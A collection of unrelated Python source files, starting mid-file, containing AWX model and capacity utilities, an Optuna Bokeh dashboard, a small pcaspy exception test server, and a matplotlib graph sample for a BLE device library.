allowed_fields = [x.name for x in obj._meta.fields]
ACTIVITY_STREAM_FIELD_EXCLUSIONS = {'user': ['last_login'], 'oauth2accesstoken': ['last_used'], 'oauth2application': ['client_secret']}
model_name = obj._meta.model_name
fields_excluded = ACTIVITY_STREAM_FIELD_EXCLUSIONS.get(model_name, [])
# see definition of from_db for CredentialType
# injection logic of any managed types are incompatible with activity stream
if model_name == 'credentialtype' and obj.managed and obj.namespace:
fields_excluded.extend(['inputs', 'injectors'])
if fields_excluded:
allowed_fields = [f for f in allowed_fields if f not in fields_excluded]
return allowed_fields
def _convert_model_field_for_display(obj, field_name, password_fields=None):
# NOTE: Careful modifying the value of field_val, as it could modify
# underlying model object field value also.
try:
field_val = getattr(obj, field_name, None)
except ObjectDoesNotExist:
return '<missing {}>-{}'.format(obj._meta.verbose_name, getattr(obj, '{}_id'.format(field_name)))
if password_fields is None:
password_fields = set(getattr(type(obj), 'PASSWORD_FIELDS', [])) | set(['password'])
if field_name in password_fields or (isinstance(field_val, str) and field_val.startswith('$encrypted$')):
return u'hidden'
if hasattr(obj, 'display_%s' % field_name):
field_val = getattr(obj, 'display_%s' % field_name)()
if isinstance(field_val, (list, dict)):
try:
field_val = json.dumps(field_val, ensure_ascii=False)
except Exception:
pass
if type(field_val) not in (bool, int, type(None)):
field_val = smart_str(field_val)
return field_val
def model_instance_diff(old, new, serializer_mapping=None):
"""
Calculate the differences between two model instances. One of the instances may be None (i.e., a newly
created model or deleted model). This will cause all fields with a value to have changed (from None).
serializer_mapping are used to determine read-only fields.
When provided, read-only fields will not be included in the resulting dictionary
"""
from django.db.models import Model
if not (old is None or isinstance(old, Model)):
raise TypeError('The supplied old instance is not a valid model instance.')
if not (new is None or isinstance(new, Model)):
raise TypeError('The supplied new instance is not a valid model instance.')
old_password_fields = set(getattr(type(old), 'PASSWORD_FIELDS', [])) | set(['password'])
new_password_fields = set(getattr(type(new), 'PASSWORD_FIELDS', [])) | set(['password'])
diff = {}
allowed_fields = get_allowed_fields(new, serializer_mapping)
for field in allowed_fields:
old_value = getattr(old, field, None)
new_value = getattr(new, field, None)
if old_value != new_value:
diff[field] = (
_convert_model_field_for_display(old, field, password_fields=old_password_fields),
_convert_model_field_for_display(new, field, password_fields=new_password_fields),
)
if len(diff) == 0:
diff = None
return diff
def model_to_dict(obj, serializer_mapping=None):
"""
Serialize a model instance to a dictionary as best as possible
serializer_mapping are used to determine read-only fields.
When provided, read-only fields will not be included in the resulting dictionary
"""
password_fields = set(getattr(type(obj), 'PASSWORD_FIELDS', [])) | set(['password'])
attr_d = {}
allowed_fields = get_allowed_fields(obj, serializer_mapping)
for field_name in allowed_fields:
attr_d[field_name] = _convert_model_field_for_display(obj, field_name, password_fields=password_fields)
return attr_d
class CharPromptDescriptor:
"""Class used for identifying nullable launch config fields from class
ex. Schedule.limit
"""
def __init__(self, field):
self.field = field
class NullablePromptPseudoField:
"""
Interface for pseudo-property stored in `char_prompts` dict
Used in LaunchTimeConfig and submodels, defined here to avoid circular imports
"""
def __init__(self, field_name):
self.field_name = field_name
@cached_property
def field_descriptor(self):
return CharPromptDescriptor(self)
def __get__(self, instance, type=None):
if instance is None:
# for inspection on class itself
return self.field_descriptor
return instance.char_prompts.get(self.field_name, None)
def __set__(self, instance, value):
if value in (None, {}):
instance.char_prompts.pop(self.field_name, None)
else:
instance.char_prompts[self.field_name] = value
def copy_model_by_class(obj1, Class2, fields, kwargs):
"""
Creates a new unsaved object of type Class2 using the fields from obj1
values in kwargs can override obj1
"""
create_kwargs = {}
for field_name in fields:
descriptor = getattr(Class2, field_name)
if isinstance(descriptor, ForwardManyToOneDescriptor): # ForeignKey
# Foreign keys can be specified as field_name or field_name_id.
id_field_name = '%s_id' % field_name
if field_name in kwargs:
value = kwargs[field_name]
elif id_field_name in kwargs:
value = kwargs[id_field_name]
else:
value = getattr(obj1, id_field_name)
if hasattr(value, 'id'):
value = value.id
create_kwargs[id_field_name] = value
elif isinstance(descriptor, CharPromptDescriptor):
# difficult case of copying one launch config to another launch config
new_val = None
if field_name in kwargs:
new_val = kwargs[field_name]
elif hasattr(obj1, 'char_prompts'):
if field_name in obj1.char_prompts:
new_val = obj1.char_prompts[field_name]
elif hasattr(obj1, field_name):
# extremely rare case where a template spawns a launch config - sliced jobs
new_val = getattr(obj1, field_name)
if new_val is not None:
create_kwargs.setdefault('char_prompts', {})
create_kwargs['char_prompts'][field_name] = new_val
elif isinstance(descriptor, ManyToManyDescriptor):
continue # not copied in this method
elif field_name in kwargs:
if field_name == 'extra_vars' and isinstance(kwargs[field_name], dict):
create_kwargs[field_name] = json.dumps(kwargs['extra_vars'])
elif not isinstance(Class2._meta.get_field(field_name), (ForeignObjectRel, ManyToManyField)):
create_kwargs[field_name] = kwargs[field_name]
elif hasattr(obj1, field_name):
create_kwargs[field_name] = getattr(obj1, field_name)
# Apply class-specific extra processing for origination of unified jobs
if hasattr(obj1, '_update_unified_job_kwargs') and obj1.__class__ != Class2:
new_kwargs = obj1._update_unified_job_kwargs(create_kwargs, kwargs)
else:
new_kwargs = create_kwargs
return Class2(**new_kwargs)
def copy_m2m_relationships(obj1, obj2, fields, kwargs=None):
"""
In-place operation.
Given two saved objects, copies related objects from obj1
to obj2 to field of same name, if field occurs in `fields`
"""
for field_name in fields:
if hasattr(obj1, field_name):
try:
field_obj = obj1._meta.get_field(field_name)
except FieldDoesNotExist:
continue
if isinstance(field_obj, ManyToManyField):
# Many to Many can be specified as field_name
src_field_value = getattr(obj1, field_name)
if kwargs and field_name in kwargs:
override_field_val = kwargs[field_name]
if isinstance(override_field_val, (set, list, QuerySet)):
getattr(obj2, field_name).add(*override_field_val)
continue
if override_field_val.__class__.__name__ == 'ManyRelatedManager':
src_field_value = override_field_val
dest_field = getattr(obj2, field_name)
dest_field.add(*list(src_field_value.all().values_list('id', flat=True)))
def get_type_for_model(model):
"""
Return type name for a given model class.
"""
opts = model._meta.concrete_model._meta
return camelcase_to_underscore(opts.object_name)
def get_model_for_type(type_name):
"""
Return model class for a given type name.
"""
model_str = underscore_to_camelcase(type_name)
if model_str == 'User':
use_app = 'auth'
else:
use_app = 'main'
return apps.get_model(use_app, model_str)
def prefetch_page_capabilities(model, page, prefetch_list, user):
"""
Given a `page` list of objects, a nested dictionary of user_capabilities
are returned by id, ex.
{
4: {'edit': True, 'start': True},
6: {'edit': False, 'start': False}
}
Each capability is produced for all items in the page in a single query
Examples of prefetch language:
prefetch_list = ['admin', 'execute']
--> prefetch the admin (edit) and execute (start) permissions for
items in list for current user
prefetch_list = ['inventory.admin']
--> prefetch the related inventory FK permissions for current user,
and put it into the object's cache
prefetch_list = [{'copy': ['inventory.admin', 'project.admin']}]
--> prefetch logical combination of admin permission to inventory AND
project, put into cache dictionary as "copy"
"""
page_ids = [obj.id for obj in page]
mapping = {}
for obj in page:
mapping[obj.id] = {}
for prefetch_entry in prefetch_list:
display_method = None
if type(prefetch_entry) is dict:
display_method = list(prefetch_entry.keys())[0]
paths = prefetch_entry[display_method]
else:
paths = prefetch_entry
if type(paths) is not list:
paths = [paths]
# Build the query for accessible_objects according the user & role(s)
filter_args = []
for role_path in paths:
if '.' in role_path:
res_path = '__'.join(role_path.split('.')[:-1])
role_type = role_path.split('.')[-1]
parent_model = model
for subpath in role_path.split('.')[:-1]:
parent_model = parent_model._meta.get_field(subpath).related_model
filter_args.append(
Q(Q(**{'%s__pk__in' % res_path: parent_model.accessible_pk_qs(user, '%s_role' % role_type)}) | Q(**{'%s__isnull' % res_path: True}))
)
else:
role_type = role_path
filter_args.append(Q(**{'pk__in': model.accessible_pk_qs(user, '%s_role' % role_type)}))
if display_method is None:
# Role name translation to UI names for methods
display_method = role_type
if role_type == 'admin':
display_method = 'edit'
elif role_type in ['execute', 'update']:
display_method = 'start'
# Union that query with the list of items on page
filter_args.append(Q(pk__in=page_ids))
ids_with_role = set(model.objects.filter(*filter_args).values_list('pk', flat=True))
# Save data item-by-item
for obj in page:
mapping[obj.pk][display_method] = bool(obj.pk in ids_with_role)
return mapping
def validate_vars_type(vars_obj):
if not isinstance(vars_obj, dict):
vars_type = type(vars_obj)
if hasattr(vars_type, '__name__'):
data_type = vars_type.__name__
else:
data_type = str(vars_type)
raise AssertionError(_('Input type `{data_type}` is not a dictionary').format(data_type=data_type))
def parse_yaml_or_json(vars_str, silent_failure=True):
"""
Attempt to parse a string of variables.
First, with JSON parser, if that fails, then with PyYAML.
If both attempts fail, return an empty dictionary if `silent_failure`
is True, re-raise combination error if `silent_failure` if False.
"""
if isinstance(vars_str, dict):
return vars_str
elif isinstance(vars_str, str) and vars_str == '""':
return {}
try:
vars_dict = json.loads(vars_str)
validate_vars_type(vars_dict)
except (ValueError, TypeError, AssertionError) as json_err:
try:
vars_dict = yaml.safe_load(vars_str)
# Can be None if '---'
if vars_dict is None:
vars_dict = {}
validate_vars_type(vars_dict)
if not silent_failure:
# is valid YAML, check that it is compatible with JSON
try:
json.dumps(vars_dict)
except (ValueError, TypeError, AssertionError) as json_err2:
raise ParseError(_('Variables not compatible with JSON standard (error: {json_error})').format(json_error=str(json_err2)))
except (yaml.YAMLError, TypeError, AttributeError, AssertionError) as yaml_err:
if silent_failure:
return {}
raise ParseError(
_('Cannot parse as JSON (error: {json_error}) or ' 'YAML (error: {yaml_error}).').format(json_error=str(json_err), yaml_error=str(yaml_err))
)
return vars_dict
def get_cpu_capacity():
from django.conf import settings
settings_forkcpu = getattr(settings, 'SYSTEM_TASK_FORKS_CPU', None)
env_forkcpu = os.getenv('SYSTEM_TASK_FORKS_CPU', None)
settings_abscpu = getattr(settings, 'SYSTEM_TASK_ABS_CPU', None)
env_abscpu = os.getenv('SYSTEM_TASK_ABS_CPU', None)
if env_abscpu is not None:
return 0, int(env_abscpu)
elif settings_abscpu is not None:
return 0, int(settings_abscpu)
cpu = psutil.cpu_count()
if env_forkcpu:
forkcpu = int(env_forkcpu)
elif settings_forkcpu:
forkcpu = int(settings_forkcpu)
else:
forkcpu = 4
return (cpu, cpu * forkcpu)
def get_mem_capacity():
from django.conf import settings
settings_forkmem = getattr(settings, 'SYSTEM_TASK_FORKS_MEM', None)
env_forkmem = os.getenv('SYSTEM_TASK_FORKS_MEM', None)
settings_absmem = getattr(settings, 'SYSTEM_TASK_ABS_MEM', None)
env_absmem = os.getenv('SYSTEM_TASK_ABS_MEM', None)
if env_absmem is not None:
return 0, int(env_absmem)
elif settings_absmem is not None:
return 0, int(settings_absmem)
if env_forkmem:
forkmem = int(env_forkmem)
elif settings_forkmem:
forkmem = int(settings_forkmem)
else:
forkmem = 100
mem = psutil.virtual_memory().total
return (mem, max(1, ((mem // 1024 // 1024) - 2048) // forkmem))
def get_system_task_capacity(scale=Decimal(1.0), cpu_capacity=None, mem_capacity=None):
"""
Measure system memory and use it as a baseline for determining the system's capacity
"""
from django.conf import settings
settings_forks = getattr(settings, 'SYSTEM_TASK_FORKS_CAPACITY', None)
env_forks = os.getenv('SYSTEM_TASK_FORKS_CAPACITY', None)
if env_forks:
return int(env_forks)
elif settings_forks:
return int(settings_forks)
if cpu_capacity is None:
_, cpu_cap = get_cpu_capacity()
else:
cpu_cap = cpu_capacity
if mem_capacity is None:
_, mem_cap = get_mem_capacity()
else:
mem_cap = mem_capacity
return min(mem_cap, cpu_cap) + ((max(mem_cap, cpu_cap) - min(mem_cap, cpu_cap)) * scale)
_inventory_updates = threading.local()
_task_manager = threading.local()
@contextlib.contextmanager
def ignore_inventory_computed_fields():
"""
Context manager to ignore updating inventory computed fields.
"""
try:
previous_value = getattr(_inventory_updates, 'is_updating', False)
_inventory_updates.is_updating = True
yield
finally:
_inventory_updates.is_updating = previous_value
def _schedule_task_manager():
from awx.main.scheduler.tasks import run_task_manager
from django.db import connection
# runs right away if not in transaction
connection.on_commit(lambda: run_task_manager.delay())
@contextlib.contextmanager
def task_manager_bulk_reschedule():
"""Context manager to avoid submitting task multiple times."""
try:
previous_flag = getattr(_task_manager, 'bulk_reschedule', False)
previous_value = getattr(_task_manager, 'needs_scheduling', False)
_task_manager.bulk_reschedule = True
_task_manager.needs_scheduling = False
yield
finally:
_task_manager.bulk_reschedule = previous_flag
if _task_manager.needs_scheduling:
_schedule_task_manager()
_task_manager.needs_scheduling = previous_value
def schedule_task_manager():
if getattr(_task_manager, 'bulk_reschedule', False):
_task_manager.needs_scheduling = True
return
_schedule_task_manager()
@contextlib.contextmanager
def ignore_inventory_group_removal():
"""
Context manager to ignore moving groups/hosts when group is deleted.
"""
try:
previous_value = getattr(_inventory_updates, 'is_removing', False)
_inventory_updates.is_removing = True
yield
finally:
_inventory_updates.is_removing = previous_value
@contextlib.contextmanager
def set_environ(**environ):
"""
Temporarily set the process environment variables.
>>> with set_environ(FOO='BAR'):
... assert os.environ['FOO'] == 'BAR'
"""
old_environ = os.environ.copy()
try:
os.environ.update(environ)
yield
finally:
os.environ.clear()
os.environ.update(old_environ)
def get_pk_from_dict(_dict, key):
"""
Helper for obtaining a pk from user data dict or None if not present.
"""
try:
val = _dict[key]
if isinstance(val, object) and hasattr(val, 'id'):
return val.id # return id if given model object
return int(val)
except (TypeError, KeyError, ValueError):
return None
class NoDefaultProvided(object):
pass
def getattrd(obj, name, default=NoDefaultProvided):
"""
Same as getattr(), but allows dot notation lookup
Discussed in:
http://stackoverflow.com/questions/11975781
"""
try:
return reduce(getattr, name.split("."), obj)
except AttributeError:
if default != NoDefaultProvided:
return default
raise
def getattr_dne(obj, name, notfound=ObjectDoesNotExist):
try:
return getattr(obj, name)
except notfound:
return None
current_apps = apps
def set_current_apps(apps):
global current_apps
current_apps = apps
def get_current_apps():
global current_apps
return current_apps
def get_custom_venv_choices():
from django.conf import settings
all_venv_paths = settings.CUSTOM_VENV_PATHS + [settings.BASE_VENV_PATH]
custom_venv_choices = []
for venv_path in all_venv_paths:
if os.path.exists(venv_path):
for d in os.listdir(venv_path):
if venv_path == settings.BASE_VENV_PATH and d == 'awx':
continue
if os.path.exists(os.path.join(venv_path, d, 'bin', 'pip')):
custom_venv_choices.append(os.path.join(venv_path, d))
return custom_venv_choices
def get_custom_venv_pip_freeze(venv_path):
pip_path = os.path.join(venv_path, 'bin', 'pip')
try:
freeze_data = subprocess.run([pip_path, "freeze"], capture_output=True)
pip_data = (freeze_data.stdout).decode('UTF-8')
return pip_data
except Exception:
logger.exception("Encountered an error while trying to run 'pip freeze' for custom virtual environments:")
def is_ansible_variable(key):
return key.startswith('ansible_')
def extract_ansible_vars(extra_vars):
extra_vars = parse_yaml_or_json(extra_vars)
ansible_vars = set([])
for key in list(extra_vars.keys()):
if is_ansible_variable(key):
extra_vars.pop(key)
ansible_vars.add(key)
return (extra_vars, ansible_vars)
def get_search_fields(model):
fields = []
for field in model._meta.fields:
if field.name in ('username', 'first_name', 'last_name', 'email', 'name', 'description'):
fields.append(field.name)
return fields
def has_model_field_prefetched(model_obj, field_name):
# NOTE: Update this function if django internal implementation changes.
return getattr(getattr(model_obj, field_name, None), 'prefetch_cache_name', '') in getattr(model_obj, '_prefetched_objects_cache', {})
def get_external_account(user):
from django.conf import settings
account_type = None
if getattr(settings, 'AUTH_LDAP_SERVER_URI', None):
try:
if user.pk and user.profile.ldap_dn and not user.has_usable_password():
account_type = "ldap"
except AttributeError:
pass
if (
getattr(settings, 'SOCIAL_AUTH_GOOGLE_OAUTH2_KEY', None)
or getattr(settings, 'SOCIAL_AUTH_GITHUB_KEY', None)
or getattr(settings, 'SOCIAL_AUTH_GITHUB_ORG_KEY', None)
or getattr(settings, 'SOCIAL_AUTH_GITHUB_TEAM_KEY', None)
or getattr(settings, 'SOCIAL_AUTH_SAML_ENABLED_IDPS', None)
) and user.social_auth.all():
account_type = "social"
if (getattr(settings, 'RADIUS_SERVER', None) or getattr(settings, 'TACACSPLUS_HOST', None)) and user.enterprise_auth.all():
account_type = "enterprise"
return account_type
class classproperty:
def __init__(self, fget=None, fset=None, fdel=None, doc=None):
self.fget = fget
self.fset = fset
self.fdel = fdel
if doc is None and fget is not None:
doc = fget.__doc__
self.__doc__ = doc
def __get__(self, instance, ownerclass):
return self.fget(ownerclass)
def create_temporary_fifo(data):
"""Open fifo named pipe in a new thread using a temporary file path. The
thread blocks until data is read from the pipe.
Returns the path to the fifo.
:param data(bytes): Data to write to the pipe.
"""
path = os.path.join(tempfile.mkdtemp(), next(tempfile._get_candidate_names()))
os.mkfifo(path, stat.S_IRUSR | stat.S_IWUSR)
threading.Thread(target=lambda p, d: open(p, 'wb').write(d), args=(path, data)).start()
return path
def truncate_stdout(stdout, size):
from awx.main.constants import ANSI_SGR_PATTERN
if size <= 0 or len(stdout) <= size:
return stdout
stdout = stdout[: (size - 1)] + u'\u2026'
set_count, reset_count = 0, 0
for m in ANSI_SGR_PATTERN.finditer(stdout):
if m.group() == u'\u001b[0m':
reset_count += 1
else:
set_count += 1
return stdout + u'\u001b[0m' * (set_count - reset_count)
def deepmerge(a, b):
"""
Merge dict structures and return the result.
>>> a = {'first': {'all_rows': {'pass': 'dog', 'number': '1'}}}
>>> b = {'first': {'all_rows': {'fail': 'cat', 'number': '5'}}}
>>> import pprint; pprint.pprint(deepmerge(a, b))
{'first': {'all_rows': {'fail': 'cat', 'number': '5', 'pass': 'dog'}}}
"""
if isinstance(a, dict) and isinstance(b, dict):
return dict([(k, deepmerge(a.get(k), b.get(k))) for k in set(a.keys()).union(b.keys())])
elif b is None:
return a
else:
return b
def create_partition(tblname, start=None, end=None, partition_label=None, minutely=False):
"""Creates new partition table for events.
- start defaults to beginning of current hour
- end defaults to end of current hour
- partition_label defaults to YYYYMMDD_HH
- minutely will create partitions that span _a single minute_ for testing purposes
"""
current_time = now()
if not start:
if minutely:
start = current_time.replace(microsecond=0, second=0)
else:
start = current_time.replace(microsecond=0, second=0, minute=0)
if not end:
if minutely:
end = start.replace(microsecond=0, second=0) + timedelta(minutes=1)
else:
end = start.replace(microsecond=0, second=0, minute=0) + timedelta(hours=1)
start_timestamp = str(start)
end_timestamp = str(end)
if not partition_label:
if minutely:
partition_label = start.strftime('%Y%m%d_%H%M')
else:
partition_label = start.strftime('%Y%m%d_%H')
with connection.cursor() as cursor:
cursor.execute(
f'CREATE TABLE IF NOT EXISTS {tblname}_{partition_label} '
f'PARTITION OF {tblname} '
f'FOR VALUES FROM (\'{start_timestamp}\') to (\'{end_timestamp}\');'
)
def cleanup_new_process(func):
"""
Cleanup django connection, cache connection, before executing new thread or processes entry point, func.
"""
@wraps(func)
def wrapper_cleanup_new_process(*args, **kwargs):
from awx.conf.settings import SettingsWrapper # noqa
django_connection.close()
django_cache.close()
SettingsWrapper.initialize()
return func(*args, **kwargs)
return wrapper_cleanup_new_process
|
dashboard.py
|
try:
import bokeh.command.bootstrap
import bokeh.document # NOQA
import bokeh.layouts
import bokeh.models
import bokeh.models.widgets
import bokeh.plotting
import bokeh.themes
import tornado.gen
_available = True
except ImportError as e:
_available = False
_import_error = e
import collections
import numpy as np
import threading
import time
from typing import Any # NOQA
from typing import Dict # NOQA
from typing import List # NOQA
from typing import Optional # NOQA
import optuna.logging
import optuna.structs
import optuna.study
_mode = None # type: Optional[str]
_study = None # type: Optional[optuna.study.Study]
_HEADER_FORMAT = '''
<style>
body {{
margin: 20px;
}}
h1, p {{
margin: 10px 0px;
}}
</style>
<h1>Optuna Dashboard (Beta)</h1>
<p>
<b>Study name:</b> {study_name}<br>
</p>
'''
_DATETIME_FORMAT = '%Y-%m-%d %H:%M:%S'
if _available:
class _CompleteTrialsWidget(object):
def __init__(self, trials):
# type: (List[optuna.structs.FrozenTrial]) -> None
complete_trials = [
trial for trial in trials if trial.state == optuna.structs.TrialState.COMPLETE
]
self.trial_ids = set([trial.trial_id for trial in complete_trials])
values = [trial.value for trial in complete_trials]
best_values = np.minimum.accumulate(values, axis=0)
self.cds = bokeh.models.ColumnDataSource({
'#': list(range(len(complete_trials))),
'value': values,
'best_value': best_values,
})
self.best_value = best_values[-1] if complete_trials else np.inf
def create_figure(self):
# type: () -> bokeh.plotting.Figure
figure = bokeh.plotting.figure(height=150)
figure.circle(x='#', y='value', source=self.cds, alpha=0.3, color='navy')
figure.line(x='#', y='best_value', source=self.cds, color='firebrick')
figure.xaxis[0].axis_label = 'Number of Trials'
figure.yaxis[0].axis_label = 'Objective Value'
return figure
def update(self, new_trials):
# type: (List[optuna.structs.FrozenTrial]) -> None
stream_dict = collections.defaultdict(list) # type: Dict[str, List[Any]]
for trial in new_trials:
if trial.state != optuna.structs.TrialState.COMPLETE:
continue
if trial.trial_id in self.trial_ids:
continue
stream_dict['#'].append(len(self.trial_ids))
stream_dict['value'].append(trial.value)
self.best_value = min(self.best_value, trial.value)
stream_dict['best_value'].append(self.best_value)
self.trial_ids.add(trial.trial_id)
if stream_dict:
self.cds.stream(stream_dict)
class _AllTrialsWidget(object):
def __init__(self, trials):
# type: (List[optuna.structs.FrozenTrial]) -> None
self.cds = bokeh.models.ColumnDataSource(self.trials_to_dict(trials))
def create_table(self):
# type: () -> bokeh.models.widgets.DataTable
return bokeh.models.widgets.DataTable(
source=self.cds,
columns=[
bokeh.models.widgets.TableColumn(field=field, title=field) for field in [
'trial_id', 'state', 'value', 'params', 'datetime_start',
'datetime_complete'
]
])
def update(
self,
old_trials, # type: List[optuna.structs.FrozenTrial]
new_trials, # type: List[optuna.structs.FrozenTrial]
):
# type: (...) -> None
modified_indices = []
modified_trials = []
for i, old_trial in enumerate(old_trials):
new_trial = new_trials[i]
if old_trial != new_trial:
modified_indices.append(i)
modified_trials.append(new_trial)
patch_dict = self.trials_to_dict(modified_trials)
patch_dict = {k: list(zip(modified_indices, v)) for k, v in patch_dict.items()}
self.cds.patch(patch_dict)
self.cds.stream(self.trials_to_dict(new_trials[len(old_trials):]))
@staticmethod
def trials_to_dict(trials):
# type: (List[optuna.structs.FrozenTrial]) -> Dict[str, List[Any]]
return {
'trial_id': [trial.trial_id for trial in trials],
'state': [trial.state.name for trial in trials],
'value': [trial.value for trial in trials],
'params': [str(trial.params) for trial in trials],
'datetime_start': [
trial.datetime_start.strftime(_DATETIME_FORMAT)
if trial.datetime_start is not None else None for trial in trials
],
'datetime_complete': [
trial.datetime_complete.strftime(_DATETIME_FORMAT)
if trial.datetime_complete is not None else None for trial in trials
],
}
class _DashboardApp(object):
def __init__(self, study, launch_update_thread):
# type: (optuna.study.Study, bool) -> None
self.study = study
self.launch_update_thread = launch_update_thread
self.lock = threading.Lock()
def __call__(self, doc):
# type: (bokeh.document.Document) -> None
self.doc = doc
self.current_trials = \
self.study.trials # type: Optional[List[optuna.structs.FrozenTrial]]
self.new_trials = None # type: Optional[List[optuna.structs.FrozenTrial]]
self.complete_trials_widget = _CompleteTrialsWidget(self.current_trials)
self.all_trials_widget = _AllTrialsWidget(self.current_trials)
self.doc.title = 'Optuna Dashboard (Beta)'
header = _HEADER_FORMAT.format(study_name=self.study.study_name)
self.doc.add_root(
bokeh.layouts.layout([[bokeh.models.widgets.Div(text=header)],
[self.complete_trials_widget.create_figure()],
[self.all_trials_widget.create_table()]],
sizing_mode='scale_width'))
if self.launch_update_thread:
thread = threading.Thread(target=self.thread_loop)
thread.daemon = True
thread.start()
def thread_loop(self):
# type: () -> None
while True:
time.sleep(1)
new_trials = self.study.trials
with self.lock:
need_to_add_callback = (self.new_trials is None)
self.new_trials = new_trials
if need_to_add_callback:
self.doc.add_next_tick_callback(self.update_callback)
@tornado.gen.coroutine
def update_callback(self):
# type: () -> None
with self.lock:
current_trials = self.current_trials
new_trials = self.new_trials
self.current_trials = self.new_trials
self.new_trials = None
assert current_trials is not None
assert new_trials is not None
self.complete_trials_widget.update(new_trials)
self.all_trials_widget.update(current_trials, new_trials)
def _check_bokeh_availability():
# type: () -> None
if not _available:
raise ImportError(
'Bokeh is not available. Please install Bokeh to use the dashboard. '
'Bokeh can be installed by executing `$ pip install bokeh`. '
'For further information, please refer to the installation guide of Bokeh. '
'(The actual import error is as follows: ' + str(_import_error) + ')')
def _show_experimental_warning():
# type: () -> None
logger = optuna.logging.get_logger(__name__)
logger.warning('Optuna dashboard is still highly experimental. Please use with caution!')
def _get_this_source_path():
# type: () -> str
path = __file__
# Sometimes __file__ points to a *.pyc file, but Bokeh doesn't accept it.
if path.endswith('.pyc'):
path = path[:-1]
return path
def serve(study, bokeh_allow_websocket_origins=None):
# type: (optuna.study.Study, Optional[List[str]]) -> None
global _mode, _study
_check_bokeh_availability()
_show_experimental_warning()
# We want to pass the mode (launching a server? or, just writing an HTML?) and a target study
# to our Bokeh app. Unfortunately, as we are using `bokeh.command.bootstrap.main` to launch
# our Bokeh app, we cannot directly pass Python objects to it. Therefore, we have no choice but
# to use global variables to pass them.
_mode = 'serve'
_study = study
# TODO(akiba): Stop using Bokeh's CLI entry point, and start the HTTP server by ourselves.
# This is not a very clean way to launch Bokeh server.
# Another seemingly better way is to
# instantiate and launch `bokeh.server.server.Server` by ourselves. However, in this way,
# for some reason, we found that the CDS update is not reflected to browsers, at least on Bokeh
# version 0.12.15. In addition, we will need to do many configuration to servers, which can be
# done automatically with the following one line. So, for now, we decided to use this way.
command = ['bokeh', 'serve', '--show', _get_this_source_path()]
if bokeh_allow_websocket_origins is not None:
for bokeh_allow_websocket_origin in bokeh_allow_websocket_origins:
command.extend(['--allow-websocket-origin', bokeh_allow_websocket_origin])
bokeh.command.bootstrap.main(command)
def write(study, out_path):
# type: (optuna.study.Study, str) -> None
global _mode, _study
_check_bokeh_availability()
_show_experimental_warning()
_mode = 'html'
_study = study
bokeh.command.bootstrap.main(['bokeh', 'html', _get_this_source_path(), '-o', out_path])
def _run():
# type: () -> None
# Please note that `_study` and `optuna.dashboard._study` are different here. Here, this module
# is loaded inside Bokeh, and thus it is not `optuna.dashboard`, but `bk_script_????`.
study = optuna.dashboard._study
mode = optuna.dashboard._mode
assert study is not None
app = _DashboardApp(study, launch_update_thread=(mode == 'serve'))
doc = bokeh.plotting.curdoc()
app(doc)
if __name__.startswith('bk_script_'):
# Here, this module is loaded inside Bokeh. Therefore, we should launch the Bokeh app.
_run()
|
exceptionTest.py
|
#!/usr/bin/env python
from pcaspy import Driver, SimpleServer
import time
prefix = 'MTEST:'
pvdb = {
'RAND' : {
'prec' : 3,
'count': 3,
},
}
import threading
import numpy
class myDriver(Driver):
def __init__(self):
super(myDriver, self).__init__()
self.value = numpy.array([1,2,3])
tid = threading.Thread(target = self.do)
tid.setDaemon(True)
tid.start()
def read(self, reason):
foo
pass
def write(self, reason, value):
pass
def do(self,):
while True:
self.value[1] += 1
self.setParam('RAND', self.value)
self.updatePVs()
time.sleep(1)
if __name__ == '__main__':
server = SimpleServer()
server.createPV(prefix, pvdb)
driver = myDriver()
# process CA transactions
while True:
server.process(0.1)
|
sample_graph.py
|
import asyncio
import logging
import multiprocessing
from datetime import datetime
from matplotlib import pyplot
from matplotlib.animation import FuncAnimation
import lelof1py as f1client
from sample_gui import *
class GraphContext:
graph_x_count = 0
graph_x = []
graph_y = []
figure = None
line = None
animation = None
snapshot = None
limit = 400
interval = 100
def __init__(self, queue):
self.snapshot = dict()
self.queue = queue
def graph_runner(self):
logging.info('creating graph')
try:
self.figure = pyplot.figure()
self.line, = pyplot.plot_date(self.graph_x, self.graph_y, '-')
self.animation = FuncAnimation(self.figure, self.update_graph, interval=self.interval)
pyplot.show()
except Exception as e:
logging.exception('error creating graph: %s', e)
raise e
def update_graph(self, frame):
try:
if not self.queue:
return
if not self.queue.empty():
read = self.queue.get_nowait()
if read:
logging.debug('got data from queue, setting %s = %s', read[0], read[1])
self.snapshot[read[0]] = read[1]
logging.debug('updating graph')
if 'pressure' in self.snapshot:
self.graph_x.append(datetime.now())
self.graph_y.append(self.snapshot['pressure'])
self.graph_x_count = self.graph_x_count + 1
if self.graph_x_count > self.limit:
self.graph_x = self.graph_x[-self.limit:]
self.graph_y = self.graph_y[-self.limit:]
self.graph_x_count = self.limit
self.line.set_data(self.graph_x, self.graph_y)
self.figure.gca().relim()
self.figure.gca().autoscale_view()
logging.debug('updated graph')
return self.line,
except Exception as e:
logging.exception('error updating graph: %s', e)
raise e
# Initialize context with service
class GUISampleGraph(GUISample):
'''
Complete sample of device discovery, connection and control with simple GUI
'''
def __init__(self, queue, loop, refresh_interval=1/100):
'''
Initializes the window and prepares the layout
'''
self.queue = queue
super(GUISampleGraph, self).__init__(loop, refresh_interval)
async def post_construct(self):
'''
Method to be overrided
'''
self.tasks.append(self.loop.create_task(self.sensor_status_updater(1)))
def temperature_and_pressure_changed(self, new_value):
'''
Handle a change in pressure or temperature data
'''
super(GUISampleGraph, self).temperature_and_pressure_changed(new_value)
self.queue.put(['pressure', new_value[1]])
if __name__ == '__main__':
# Configure logging to a basic level
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.DEBUG)
# Configure logging for the library
logging.getLogger(f1client.Constants.LOGGER_NAME).setLevel(logging.DEBUG)
logging.getLogger(f1client.Constants.LOGGER_IO_NAME).setLevel(logging.INFO)
logging.getLogger(f1client.Constants.LOGGER_CALLBACK_NAME).setLevel(logging.INFO)
logging.getLogger('matplotlib').setLevel(logging.INFO)
# Configure logging for the backend BLE adapter (bleak)
logging.getLogger('bleak').setLevel(logging.INFO)
# use the multiprocessing module to perform the plotting activity in another process (i.e., on another core):
queue = multiprocessing.Queue(1000)
gc = GraphContext(queue)
job_for_another_core = multiprocessing.Process(target=gc.graph_runner)
# Run the sample in asyncio event loop
loop = asyncio.get_event_loop()
app = GUISampleGraph(queue, loop)
job_for_another_core.start()
loop.run_forever()
loop.close()
|
test_auto_scheduler_measure.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
